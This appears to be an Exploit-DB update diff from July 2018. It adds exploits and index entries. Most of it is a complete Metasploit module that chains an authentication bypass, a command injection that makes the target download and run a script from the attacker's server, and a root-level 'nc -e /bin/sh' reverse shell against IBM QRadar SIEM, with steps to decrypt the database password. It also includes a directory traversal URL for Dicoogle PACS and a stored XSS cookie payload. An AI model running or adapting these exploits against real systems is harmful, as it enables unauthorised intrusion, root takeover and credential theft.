DB: 2018-07-12

5 changes to exploits/shellcodes

Nibbleblog - Arbitrary File Upload (Metasploit)
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)

IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)

Nibbleblog - Multiple SQL Injections
Nibbleblog 3 - Multiple SQL Injections
Instagram-Clone Script 2.0 - Cross-Site Scripting
Dicoogle PACS 2.5.0 - Directory Traversal

exploits/hardware/local/44206.c

@@ -6,7 +6,7 @@
 
 	- @kr105rlz
 
-Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
+Download: http://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
 */
 
 #include "ps4.h"

exploits/linux/local/44205.md

@@ -13,4 +13,4 @@ $ make
 # Reference
 [Exploiting “BadIRET” vulnerability (CVE-2014-9322, Linux kernel privilege escalation)](https://blogs.bromium.com/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/)  
 
-Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44205.zip

exploits/linux/webapps/45007.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
+# Date: 2018-05-25
+# Software Link: http://www.dicoogle.com/home
+# Version: Dicoogle PACS 2.5.0-20171229_1522
+# Category: webapps
+# Tested on: Windows 2012 R2
+# Exploit Author: Carlos Avila
+# Contact: http://twitter.com/badboy_nt
+
+# 1. Description
+# Dicoogle is an open source medical imaging repository with an extensible
+# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
+# to local file inclusion. This allows an attacker to read arbitrary files that the
+# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
+# via GET is vulnerable.
+
+# 2. Proof of Concept
+
+http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

exploits/php/webapps/45003.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
+# Date: 2018-07-10
+# Exploit Author: L0RD
+# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
+# Version: 2.0
+# CVE: CVE-2018-13849
+# Tested on: Kali linux
+
+# POC : Persistent Cross site scripting :
+# vulnerable file : edit_requests.php
+# vulnerable code :
+
+if (isset($_POST['username'])) {
+      $username = preg_replace("#[<> ]#i", "", $_POST['username']);
+      $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
+      $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
+      $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
+      $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
+      $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
+      $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
+      $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
+      $website = preg_replace("#[<>]#i", "", $_POST['website']);
+      $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
+      $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
+ $session = $_SESSION['id'];
+
+      $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
+$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
+      $array = array("mssg" => $m);
+      echo json_encode($array);
+    }
+
+# We use this payload to bypass filter :
+# Payload : 
+
+"onmouseover=" alert(document.cookie)

exploits/unix/remote/45005.rb

@@ -0,0 +1,228 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'securerandom'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'IBM QRadar SIEM Unauthenticated Remote Code Execution',
+      'Description'    => %q{
+        IBM QRadar SIEM has three vulnerabilities in the Forensics web application
+        that when chained together allow an attacker to achieve unauthenticated remote code execution.
+
+        The first stage bypasses authentication by fixating session cookies.
+        The second stage uses those authenticated sessions cookies to write a file to disk and execute
+        that file as the "nobody" user.
+        The third and final stage occurs when the file executed as "nobody" writes an entry into the
+        database that causes QRadar to execute a shell script controlled by the attacker as root within
+        the next minute.
+        Details about these vulnerabilities can be found in the advisories listed in References.
+
+        The Forensics web application is disabled in QRadar Community Edition, but the code still works,
+        so these vulnerabilities can be exploited in all flavours of QRadar.
+        This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. IBM has confirmed versions up to 7.2.8
+        patch 12 and 7.3.1 patch 3 are vulnerable.
+        Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload.
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+         ['CVE', '2016-9722'],
+         ['CVE', '2018-1418'],
+         ['CVE', '2018-1612'],
+         ['URL', 'https://blogs.securiteam.com/index.php/archives/3689'],
+         ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt'],
+         ['URL', 'http://seclists.org/fulldisclosure/2018/May/54'],
+         ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg22015797']
+        ],
+      'Targets'        =>
+        [
+          [ 'IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11', {} ],
+        ],
+      'Payload'        => {
+        'Compat'       => {
+          'ConnectionType'  => 'reverse',
+        }
+      },
+      'DefaultOptions'  => {
+        'SSL'     => true,
+        # we can only run shell scripts, so set a reverse netcat payload by default
+        # the payload that will be run is in the first few lines of @payload
+        'PAYLOAD' => 'generic/shell_reverse_tcp',
+      },
+      'DisclosureDate'  => 'May 28 2018',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('SRVHOST', [true, 'HTTP server address', '0.0.0.0']),
+        OptString.new('SRVPORT', [true, 'HTTP server port', '4448']),
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'    => '/ForensicsAnalysisServlet/',
+      'method' => 'GET'
+    })
+
+    if res.nil?
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code == 403
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    vprint_error 'Connection failed'
+    return CheckCode::Unknown
+  end
+
+  # Handle incoming requests from QRadar
+  def on_request_uri(cli, request)
+    print_good("#{peer} - Sending privilege escalation payload to QRadar...")
+    print_good("#{peer} - Sit back and relax, Shelly will come visit soon!")
+    send_response(cli, @payload)
+  end
+
+
+  # step 1 of the exploit, bypass authentication in the ForensicAnalysisServlet
+  def set_cookies
+    @sec_cookie = SecureRandom.uuid
+    @csrf_cookie = SecureRandom.uuid
+
+    post_data = "#{rand_text_alpha(5..12)},#{rand_text_alpha(5..12)}," +
+      "#{@sec_cookie},#{@csrf_cookie}"
+
+    res = send_request_cgi({
+      'uri'       => '/ForensicsAnalysisServlet/',
+      'method'    => 'POST',
+      'ctype'     => 'application/json',
+      'cookie'    => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};",
+      'vars_get'  =>
+      {
+        'action'  => 'setSecurityTokens',
+        'forensicsManagedHostIps' => "#{rand(256)}.#{rand(256)}.#{rand(256)}.#{rand(256)}"
+      },
+      'data'      => post_data
+    })
+
+    if res.nil? or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Failed to set the SEC and QRadar CSRF cookies")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Attempting to exploit #{target.name}")
+
+    # run step 1
+    set_cookies
+
+    # let's prepare step 2 (payload) and 3 (payload exec as root)
+    @payload_name = rand_text_alpha_lower(3..5)
+    root_payload = rand_text_alpha_lower(3..5)
+
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    http_service = (datastore['SSL'] ? 'https://' : 'http://') + srv_host + ':' + datastore['SRVPORT'].to_s
+    service_uri = http_service + '/' + @payload_name
+
+    print_status("#{peer} - Starting up our web service on #{http_service} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => "/#{@payload_name}"
+    }})
+
+    @payload = %{#!/bin/bash
+
+# our payload that's going to be downloaded from our web server
+cat <<EOF > /store/configservices/staging/updates/#{root_payload}
+#!/bin/bash
+/usr/bin/nc -e /bin/sh #{datastore['LHOST']} #{datastore['LPORT']} &
+EOF
+
+### below is adapted from /opt/qradar/support/changePasswd.sh
+[ -z $NVA_CONF ] && NVA_CONF="/opt/qradar/conf/nva.conf"
+NVACONF=`grep "^NVACONF=" $NVA_CONF 2> /dev/null | cut -d= -f2`
+FRAMEWORKS_PROPERTIES_FILE="frameworks.properties"
+FORENSICS_USER_FILE="config_user.xml"
+FORENSICS_USER_FILE_CONFIG="$NVACONF/$FORENSICS_USER_FILE"
+
+# get the encrypted db password from the config
+PASSWORDENCRYPTED=`cat $FORENSICS_USER_FILE_CONFIG | grep WEBUSER_DB_PASSWORD | grep -o -P '(?<=>)([\\w\\=\\+\\/]*)(?=<)'`
+
+QVERSION=$(/opt/qradar/bin/myver | awk -F. '{print $1$2$3}')
+
+AU_CRYPT=/opt/qradar/lib/Q1/auCrypto.pm
+P_ENC=$(grep I_P_ENC ${AU_CRYPT} | cut -d= -f2-)
+P_DEC=$(grep I_P_DEC ${AU_CRYPT} | cut -d= -f2-)
+
+AESKEY=`grep 'aes.key=' $NVACONF/$FRAMEWORKS_PROPERTIES_FILE | cut -c9-`
+
+#if 7.2.8 or greater, use new method for hashing and salting passwords
+if [[ $QVERSION -gt 727 || -z "$AESKEY" ]]
+then
+    PASSWORD=$(perl <(echo ${P_DEC} | base64 -d) <(echo ${PASSWORDENCRYPTED}))
+      [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255
+else
+
+    PASSWORD=`/opt/qradar/bin/runjava.sh -Daes.key=$AESKEY com.q1labs.frameworks.crypto.AESUtil decrypt $PASSWORDENCRYPTED`
+    [ $? != 0 ] && echo "ERROR: Unable to decrypt $PASSWORDENCRYPTED" && exit 255
+fi
+
+PGPASSWORD=$PASSWORD /usr/bin/psql -h localhost -U qradar qradar -c \
+"insert into autoupdate_patch values ('#{root_payload}',#{rand(1000)+100},'minor',false,#{rand(9999)+100},0,'',1,false,'','','',false)"
+
+# kill ourselves!
+(sleep 2 && rm -- "$0") &
+}
+
+    # let's do step 2 then, ask QRadar to download and execute our payload
+    print_status("#{peer} - Asking QRadar to download and execute #{service_uri}")
+
+    exec_cmd = "$(mkdir -p /store/configservices/staging/updates && wget --no-check-certificate -O " +
+      "/store/configservices/staging/updates/#{@payload_name} #{service_uri} && " +
+      "/bin/bash /store/configservices/staging/updates/#{@payload_name})"
+
+    payload_step2 = "pcap[0][pcap]" +
+      "=/#{rand_text_alpha_lower(2..6) + '/' + rand_text_alpha_lower(2..6)}" +
+      "&pcap[1][pcap]=#{Rex::Text::uri_encode(exec_cmd, 'hex-all')}"
+
+    uri_step2 = "/ForensicsAnalysisServlet/?forensicsManagedHostIps" +
+      "=127.0.0.1/forensics/file.php%3f%26&action=get&slavefile=true"
+
+    res = send_request_cgi({
+        'uri'       => uri_step2 + '&' + payload_step2,
+        'method'    => 'GET',
+        'cookie'    => "SEC=#{@sec_cookie}; QRadarCSRF=#{@csrf_cookie};",
+      })
+
+  # now we just sit back and wait for step 2 payload to be downloaded and executed
+  # ... and then step 3 to complete. Let's give it a little more than a minute.
+  Rex.sleep 80
+  end
+end

files_exploits.csv

@@ -15940,7 +15940,7 @@ id,file,description,date,author,type,platform,port
 38453,exploits/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",remote,hardware,
 38464,exploits/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",remote,hardware,
 38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",remote,hardware,
-38489,exploits/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php,
+38489,exploits/php/remote/38489.rb,"Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,remote,php,
 38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",remote,hardware,
 38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",remote,hardware,
 38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",remote,windows,
@@ -16607,6 +16607,7 @@ id,file,description,date,author,type,platform,port
 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
 45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
 45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
+45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -35166,7 +35167,7 @@ id,file,description,date,author,type,platform,port
 35861,exploits/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,webapps,php,
 35862,exploits/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",webapps,php,
 35863,exploits/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",webapps,php,
-35865,exploits/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php,
+35865,exploits/php/webapps/35865.txt,"Nibbleblog 3 - Multiple SQL Injections",2011-06-19,KedAns-Dz,webapps,php,
 35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,webapps,php,
 35867,exploits/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,webapps,php,
 35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",webapps,php,
@@ -39642,3 +39643,5 @@ id,file,description,date,author,type,platform,port
 44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
 44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
+45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
+45007,exploits/linux/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,linux,